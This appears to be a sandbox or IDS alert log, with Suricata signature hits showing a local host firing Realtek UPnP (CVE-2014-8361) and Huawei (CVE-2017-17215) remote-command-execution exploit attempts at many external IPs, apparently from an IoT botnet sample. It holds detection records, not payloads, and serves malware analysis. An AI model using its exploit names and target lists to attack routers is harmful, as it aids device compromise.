                                                07/20/24-23:05:48.082891TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613411652869192.168.2.14196.43.133.244
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812437215192.168.2.1441.98.172.199
                                                07/20/24-23:05:57.239251TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613683052869192.168.2.14110.73.58.137
                                                07/20/24-23:05:37.447452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376852869192.168.2.14212.239.177.163
                                                07/20/24-23:05:50.513568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.14157.138.150.158
                                                07/20/24-23:05:58.165543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819252869192.168.2.14212.119.81.31
                                                07/20/24-23:05:59.727506TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615007452869192.168.2.14172.49.31.94
                                                07/20/24-23:05:38.391843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087252869192.168.2.1475.119.92.151
                                                07/20/24-23:05:35.201174TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3775052869192.168.2.1468.251.134.43
                                                07/20/24-23:05:52.468494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25831252869192.168.2.14120.12.145.48
                                                07/20/24-23:06:27.889934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23433452869192.168.2.14196.52.240.32
                                                07/20/24-23:05:38.179082TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614909652869192.168.2.14159.176.16.130
                                                07/20/24-23:05:58.107636TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613744852869192.168.2.14174.28.203.137
                                                07/20/24-23:06:50.384864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615324052869192.168.2.14153.7.133.0
                                                07/20/24-23:05:40.490071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25786852869192.168.2.1427.212.16.98
                                                07/20/24-23:05:57.830942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614443052869192.168.2.14198.213.67.23
                                                07/20/24-23:05:47.438205TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614728652869192.168.2.14183.7.180.129
                                                07/20/24-23:05:50.557200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717837215192.168.2.1441.186.62.73
                                                07/20/24-23:05:57.161094TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26034452869192.168.2.14199.41.219.25
                                                07/20/24-23:05:58.216480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3980652869192.168.2.14210.62.250.25
                                                07/20/24-23:06:03.058977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248652869192.168.2.14148.124.254.69
                                                07/20/24-23:05:40.339812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24736452869192.168.2.1438.103.25.108
                                                07/20/24-23:05:35.958789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3453852869192.168.2.1448.191.112.200
                                                07/20/24-23:06:34.302136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615364252869192.168.2.1419.117.177.221
                                                07/20/24-23:05:45.161261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4742052869192.168.2.1482.30.99.23
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477237215192.168.2.1474.191.85.207
                                                07/20/24-23:06:14.916755TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614039452869192.168.2.1479.60.37.198
                                                07/20/24-23:05:35.457080TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613751052869192.168.2.1420.226.134.71
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538437215192.168.2.14157.95.64.51
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437637215192.168.2.14197.241.45.150
                                                07/20/24-23:05:45.424851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428637215192.168.2.1441.148.173.143
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143437215192.168.2.14197.21.76.109
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975637215192.168.2.14157.12.154.103
                                                07/20/24-23:05:38.057117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613847652869192.168.2.14122.165.176.151
                                                07/20/24-23:05:44.946132TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614941452869192.168.2.14182.111.218.236
                                                07/20/24-23:06:16.113186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3616252869192.168.2.14111.11.77.117
                                                07/20/24-23:05:33.827209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536637215192.168.2.1431.226.75.152
                                                07/20/24-23:05:57.556240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614381052869192.168.2.1441.130.186.1
                                                07/20/24-23:05:57.804757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614358452869192.168.2.14222.129.187.194
                                                07/20/24-23:05:58.797449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744052869192.168.2.1487.236.126.160
                                                07/20/24-23:05:45.575211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485252869192.168.2.1446.75.235.28
                                                07/20/24-23:05:35.280581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614714252869192.168.2.14153.104.11.80
                                                07/20/24-23:05:37.454427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3991052869192.168.2.14190.231.104.96
                                                07/20/24-23:05:56.997704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3339052869192.168.2.14221.233.85.98
                                                07/20/24-23:06:12.189668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451852869192.168.2.14122.215.163.185
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115637215192.168.2.14197.160.76.246
                                                07/20/24-23:06:05.732595TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24404252869192.168.2.14138.242.28.121
                                                07/20/24-23:05:37.497829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246052869192.168.2.14132.253.188.42
                                                07/20/24-23:06:04.880694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616017252869192.168.2.14114.138.107.32
                                                07/20/24-23:07:06.736138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965237215192.168.2.14157.232.5.252
                                                07/20/24-23:06:12.648653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615712852869192.168.2.1496.131.9.180
                                                07/20/24-23:06:01.918922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24347652869192.168.2.14184.54.140.200
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925237215192.168.2.14157.213.223.4
                                                07/20/24-23:05:47.127325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880037215192.168.2.14221.219.36.38
                                                07/20/24-23:05:57.210836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614416252869192.168.2.1467.151.109.138
                                                07/20/24-23:06:16.584797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614904852869192.168.2.1414.90.177.172
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147237215192.168.2.14197.237.160.210
                                                07/20/24-23:06:07.479533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614925252869192.168.2.14185.163.101.130
                                                07/20/24-23:05:57.599613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5934452869192.168.2.14107.22.142.143
                                                07/20/24-23:06:24.616747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615926852869192.168.2.14119.143.63.56
                                                07/20/24-23:06:16.626162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4130452869192.168.2.14198.203.207.18
                                                07/20/24-23:06:18.694959TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24633052869192.168.2.1435.63.184.244
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228637215192.168.2.14197.245.218.40
                                                07/20/24-23:05:52.502843TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25672652869192.168.2.14201.136.108.183
                                                07/20/24-23:05:40.446932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4692652869192.168.2.1432.192.109.254
                                                07/20/24-23:05:45.057445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591452869192.168.2.1463.16.203.38
                                                07/20/24-23:05:47.345531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3851052869192.168.2.1445.125.38.2
                                                07/20/24-23:05:38.939891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041637215192.168.2.14197.8.166.28
                                                07/20/24-23:05:57.958012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5402252869192.168.2.1417.240.156.181
                                                07/20/24-23:05:58.821284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23664052869192.168.2.14197.17.84.0
                                                07/20/24-23:06:06.828517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615048252869192.168.2.1479.219.80.235
                                                07/20/24-23:05:52.499861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5747452869192.168.2.1457.176.228.98
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215237215192.168.2.1441.164.28.249
                                                07/20/24-23:05:59.221858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613897652869192.168.2.14221.83.247.226
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555037215192.168.2.14157.38.118.86
                                                07/20/24-23:05:58.981798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615434052869192.168.2.1462.147.245.113
                                                07/20/24-23:05:59.298825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4836652869192.168.2.1490.130.53.27
                                                07/20/24-23:05:57.641730TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25442452869192.168.2.1412.166.141.196
                                                07/20/24-23:05:59.262795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614406652869192.168.2.1499.193.81.64
                                                07/20/24-23:05:44.351081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011252869192.168.2.14118.15.81.240
                                                07/20/24-23:06:13.733520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614794452869192.168.2.1478.193.254.243
                                                07/20/24-23:06:26.037863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24183852869192.168.2.1440.170.192.203
                                                07/20/24-23:05:35.517370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613326252869192.168.2.14210.141.252.193
                                                07/20/24-23:05:55.694402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5358852869192.168.2.14134.140.38.1
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467037215192.168.2.14128.4.57.232
                                                07/20/24-23:05:57.477468TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3882252869192.168.2.14141.93.218.139
                                                07/20/24-23:06:11.351053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4158452869192.168.2.1481.179.50.162
                                                07/20/24-23:06:17.683294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5668052869192.168.2.14183.52.83.104
                                                07/20/24-23:06:16.252147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615819652869192.168.2.1412.181.61.163
                                                07/20/24-23:05:35.444430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099452869192.168.2.1451.84.22.246
                                                07/20/24-23:05:33.857158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816037215192.168.2.14197.90.229.28
                                                07/20/24-23:05:34.644841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744237215192.168.2.14157.16.85.248
                                                07/20/24-23:05:48.775023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691637215192.168.2.14157.77.25.6
                                                07/20/24-23:05:35.748136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269252869192.168.2.1441.32.9.125
                                                07/20/24-23:05:35.804681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5706852869192.168.2.14220.224.214.129
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.1441.149.239.1
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839237215192.168.2.14157.140.244.171
                                                07/20/24-23:05:37.446803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843652869192.168.2.145.221.237.47
                                                07/20/24-23:06:03.150031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613784052869192.168.2.14154.14.187.144
                                                07/20/24-23:05:57.781031TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25387452869192.168.2.1495.50.102.157
                                                07/20/24-23:05:37.454427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5546652869192.168.2.14121.248.9.74
                                                07/20/24-23:06:16.602976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3589252869192.168.2.14111.251.138.247
                                                07/20/24-23:06:35.192069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712237215192.168.2.1441.172.218.214
                                                07/20/24-23:06:16.347950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5749852869192.168.2.142.211.159.113
                                                07/20/24-23:05:58.954404TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3381652869192.168.2.1499.232.17.115
                                                07/20/24-23:05:44.501694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5420452869192.168.2.1448.41.41.245
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775237215192.168.2.1423.21.50.26
                                                07/20/24-23:05:56.227686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4232452869192.168.2.14151.37.89.93
                                                07/20/24-23:05:59.198584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23555252869192.168.2.1461.154.240.237
                                                07/20/24-23:06:18.369794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4935652869192.168.2.1414.90.177.172
                                                07/20/24-23:05:56.967255TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614983452869192.168.2.14160.184.86.98
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14197.53.191.10
                                                07/20/24-23:05:44.984925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613820652869192.168.2.1489.176.48.222
                                                07/20/24-23:05:52.443193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25475252869192.168.2.14150.141.141.200
                                                07/20/24-23:05:58.922584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24888652869192.168.2.1460.41.178.30
                                                07/20/24-23:05:50.557201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978837215192.168.2.14194.37.211.160
                                                07/20/24-23:05:42.233806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622837215192.168.2.14157.165.53.82
                                                07/20/24-23:05:56.088545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399237215192.168.2.14197.201.194.135
                                                07/20/24-23:06:28.980707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615968852869192.168.2.14135.165.112.79
                                                07/20/24-23:05:36.343632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859637215192.168.2.14197.66.178.193
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905237215192.168.2.14197.201.204.182
                                                07/20/24-23:06:00.601619TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614587252869192.168.2.1466.234.95.91
                                                07/20/24-23:06:08.403626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381852869192.168.2.14152.114.75.44
                                                07/20/24-23:05:56.802194TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4221052869192.168.2.14119.6.68.125
                                                07/20/24-23:06:03.040673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4225252869192.168.2.14189.254.123.220
                                                07/20/24-23:06:05.461008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615639052869192.168.2.1420.62.77.8
                                                07/20/24-23:06:05.124334TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24788452869192.168.2.1492.219.216.50
                                                07/20/24-23:06:00.693281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802437215192.168.2.14178.33.9.178
                                                07/20/24-23:06:04.232547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6044652869192.168.2.1447.0.16.112
                                                07/20/24-23:05:34.625708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966837215192.168.2.1441.17.43.162
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059837215192.168.2.14197.11.4.107
                                                07/20/24-23:05:35.956352TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3315252869192.168.2.141.211.28.20
                                                07/20/24-23:05:39.463555TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615853052869192.168.2.1432.251.164.213
                                                07/20/24-23:05:57.194696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613488652869192.168.2.14173.6.68.101
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.1457.147.31.177
                                                07/20/24-23:05:40.446932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24692652869192.168.2.1432.192.109.254
                                                07/20/24-23:06:01.890086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4905652869192.168.2.1443.191.221.139
                                                07/20/24-23:06:03.159646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3311652869192.168.2.141.109.211.216
                                                07/20/24-23:05:35.475871TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615947852869192.168.2.1424.245.120.74
                                                07/20/24-23:06:01.173875TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23844452869192.168.2.1452.245.58.49
                                                07/20/24-23:06:01.319175TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4425052869192.168.2.1494.175.0.69
                                                07/20/24-23:06:01.649917TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615111052869192.168.2.145.141.246.151
                                                07/20/24-23:05:42.237871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.14157.58.249.139
                                                07/20/24-23:06:00.736310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4947452869192.168.2.14161.128.195.195
                                                07/20/24-23:06:16.939710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4830452869192.168.2.14173.121.227.106
                                                07/20/24-23:06:01.903875TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614149652869192.168.2.14145.253.39.34
                                                07/20/24-23:06:02.925500TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613945852869192.168.2.14146.10.41.251
                                                07/20/24-23:06:01.801044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3501452869192.168.2.1488.157.23.181
                                                07/20/24-23:05:57.001261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615798652869192.168.2.14178.246.89.184
                                                07/20/24-23:05:47.106820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350437215192.168.2.1425.149.170.104
                                                07/20/24-23:05:52.544972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6022252869192.168.2.14162.169.7.175
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896237215192.168.2.14157.80.126.166
                                                07/20/24-23:05:59.266004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616098852869192.168.2.14143.92.41.114
                                                07/20/24-23:05:58.818180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779452869192.168.2.14126.250.149.64
                                                07/20/24-23:05:52.466707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5082852869192.168.2.1462.30.160.191
                                                07/20/24-23:06:08.994885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798237215192.168.2.14157.237.188.52
                                                07/20/24-23:06:12.350524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3776452869192.168.2.14126.96.154.165
                                                07/20/24-23:05:57.001261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613314452869192.168.2.14180.234.239.68
                                                07/20/24-23:05:40.334659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25623252869192.168.2.14192.79.124.241
                                                07/20/24-23:05:52.460913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5650852869192.168.2.14207.195.83.121
                                                07/20/24-23:05:58.771763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615423052869192.168.2.1473.137.146.119
                                                07/20/24-23:06:00.460027TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615710252869192.168.2.1414.19.59.241
                                                07/20/24-23:05:57.023606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5270052869192.168.2.1467.18.202.14
                                                07/20/24-23:06:58.157771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812652869192.168.2.1451.58.43.253
                                                07/20/24-23:05:52.676146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615574652869192.168.2.14222.102.111.169
                                                07/20/24-23:06:03.741704TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615047252869192.168.2.14161.82.139.62
                                                07/20/24-23:05:35.184596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5536052869192.168.2.14176.224.174.174
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659037215192.168.2.1441.126.201.81
                                                07/20/24-23:05:46.565160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4829252869192.168.2.1499.205.208.39
                                                07/20/24-23:05:59.057513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24582852869192.168.2.14161.45.96.72
                                                07/20/24-23:05:35.860422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615034252869192.168.2.14182.202.245.171
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550037215192.168.2.1441.70.210.4
                                                07/20/24-23:05:46.309937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4120052869192.168.2.14192.36.100.230
                                                07/20/24-23:05:47.108564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801637215192.168.2.14213.50.244.72
                                                07/20/24-23:06:04.552004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4722852869192.168.2.14109.153.141.128
                                                07/20/24-23:06:24.435855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6065252869192.168.2.1412.93.26.215
                                                07/20/24-23:06:53.637724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615998252869192.168.2.1436.129.152.48
